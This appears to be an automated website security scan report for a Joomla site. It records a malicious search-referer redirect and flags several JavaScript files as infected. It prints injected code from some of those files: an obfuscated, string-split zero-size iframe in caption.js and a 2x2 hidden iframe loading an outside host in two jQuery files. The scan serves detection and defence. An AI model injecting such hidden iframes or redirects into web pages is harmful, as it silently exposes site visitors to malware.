Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://egorsilin.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: egorsilin.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sat, 30 Aug 2014 11:49:20 GMT Location: http://alicebangkokescorts.com/wpbs.html?h=2663647 Server: nginx/1.6.0 Content-Length: 234 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://egorsilin.com/ | 200 OK Content-Length: 21321 Content-Type: text/html | clean |
http://egorsilin.com/media/system/js/modal.js | 200 OK Content-Length: 10588 Content-Type: application/x-javascript | clean |
http://egorsilin.com/components/com_k2/js/k2.js | 200 OK Content-Length: 12831 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window.addEvent('domready', function(){ if($('comment-form')) { $('comment-form').addEvent('submit', function(e){ new Event(e).stop(); $('formLog').empty().addClass('formLogLoading'); this.send({ onComplete: function(res){ $('formLog').removeClass('formLogLoading').setHTML(res); if(typeof(Recaptcha) != "undefined"){ Recaptcha.reload(); } if (res.substr(13, 7) == 'success') Antivirus reports:
| ||
http://egorsilin.com/components/com_jcomments/js/jcomments-v2.1.js?v=2 | 200 OK Content-Length: 36572 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function JCommentsEvents(){} function JCommentsInput(){} function JCommentsIndicator(){this.init();} function JCommentsForm(id,editor){this.init(id,editor);} function JCommentsEditor(textarea,resizable){this.init(textarea,resizable);} function JComments(oi,og,r){this.init(oi,og,r);} JCommentsEvents.prototype = { add: function(o,e,f){if(o.addEventListener){o.addEventListener(e,f,false);return true;}else if(o.attachEvent){var r=o.attachEvent("on"+e,f);return r;}else{re Antivirus reports:
| ||
http://egorsilin.com/components/com_jcomments/libraries/joomlatune/ajax.js | 200 OK Content-Length: 13732 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (!window.jtajax) { function jtAJAX() { this.options = {url: '',type: 'post',nocache: true,data: ''}; this.$ = function(id) {if(!id){return null;}var o=document.getElementById(id);if(!o&&document.all){o=document.all[id];}return o;}; this.extend = function(o, e){for(var k in (e||{}))o[k]=e[k];return o;}; this.encode = function(t){return encodeURIComponent(t);}; this.setup = function(options) {this.options = this.extend(this.options, options);}; this Antivirus reports:
| ||
http://egorsilin.com/media/system/js/caption.js | 200 OK Content-Length: 2147 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); document.write('<iframe src="'+'ht'+'tp://k'+'ar'+'na'+'yo.gr/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="0" height="0" frameborder="0"></iframe>'); Antivirus reports:
| ||
http://egorsilin.com/modules/mod_gtranslate/jquery.js | 200 OK Content-Length: 67182 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://versaillesfamilymedicine.com/agbi.html?j=2034331></iframe>');
(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://versaillesfamilymedicine.com/agbi.html?j=2034331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://versaillesfamilymedicine.com/agbi.html?j=2034331> | ||
http://egorsilin.com/modules/mod_gtranslate/jquery-translate.js | 200 OK Content-Length: 25983 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://versaillesfamilymedicine.com/agbi.html?j=2034331></iframe>');
jQuery.noConflict(); jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { options = options || {}; if (value === null) { value = ''; options.expires = -1; } var expires = ''; i Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://versaillesfamilymedicine.com/agbi.html?j=2034331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://versaillesfamilymedicine.com/agbi.html?j=2034331> | ||
http://egorsilin.com/components/com_imageshow/jscript/swfobject.js | 200 OK Content-Length: 19973 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac= Antivirus reports:
| ||
http://egorsilin.com/administrator/components/com_imageshow/assets/js/jsn_ext_ultils.js | 200 OK Content-Length: 12759 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JSNExtUtils = { addEvent: function(target, event, func){ if (target.addEventListener){ target.addEventListener(event, func, false); return true; } else if (target.attachEvent){ var result = target.attachEvent("on"+event, func); return result; } else { return false; } }, checkSubstring: function(targetString, targetSubstring, delimeter, wholeWord){ if(wholeWord == undefined) wholeWord = false; var par Antivirus reports:
| ||
http://egorsilin.com/administrator/components/com_imageshow/assets/js/imageshow.js | 200 OK Content-Length: 51880 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JSNImageShow = { ChooseProfileFlickr:function(){ if($('select_configuration_available').checked == true){ $('source_type').disabled = false; $('flickr_api_key').disabled = true; $('flickr_secret_key').disabled = true; $('flickr_username').disabled = true; $('flickr_image_size').disabled = true; $('configuration_title').disabled = true; $('button').setStyle('display', 'none'); $('submit-form').setStyle('display', ''); } Antivirus reports:
| ||
http://egorsilin.com/index.php?option=com_phocagallery&view=categories&Itemid=48 | 200 OK Content-Length: 10162 Content-Type: text/html | clean |
http://egorsilin.com/index.php?option=com_content&view=article&id=51&Itemid=37 | 200 OK Content-Length: 13766 Content-Type: text/html | clean |
http://egorsilin.com/index.php?option=com_content&view=article&id=49&Itemid=50 | 200 OK Content-Length: 13198 Content-Type: text/html | clean |
http://egorsilin.com/index.php?view=article&id=49%3Aabout&format=pdf&option=com_content&Itemid=50 | 200 OK Content-Length: 242614 Content-Type: application/pdf | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=egorsilin.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://egorsilin.com/
Result: egorsilin.com is not infected or malware details are not published yet.
Result: egorsilin.com is not infected or malware details are not published yet.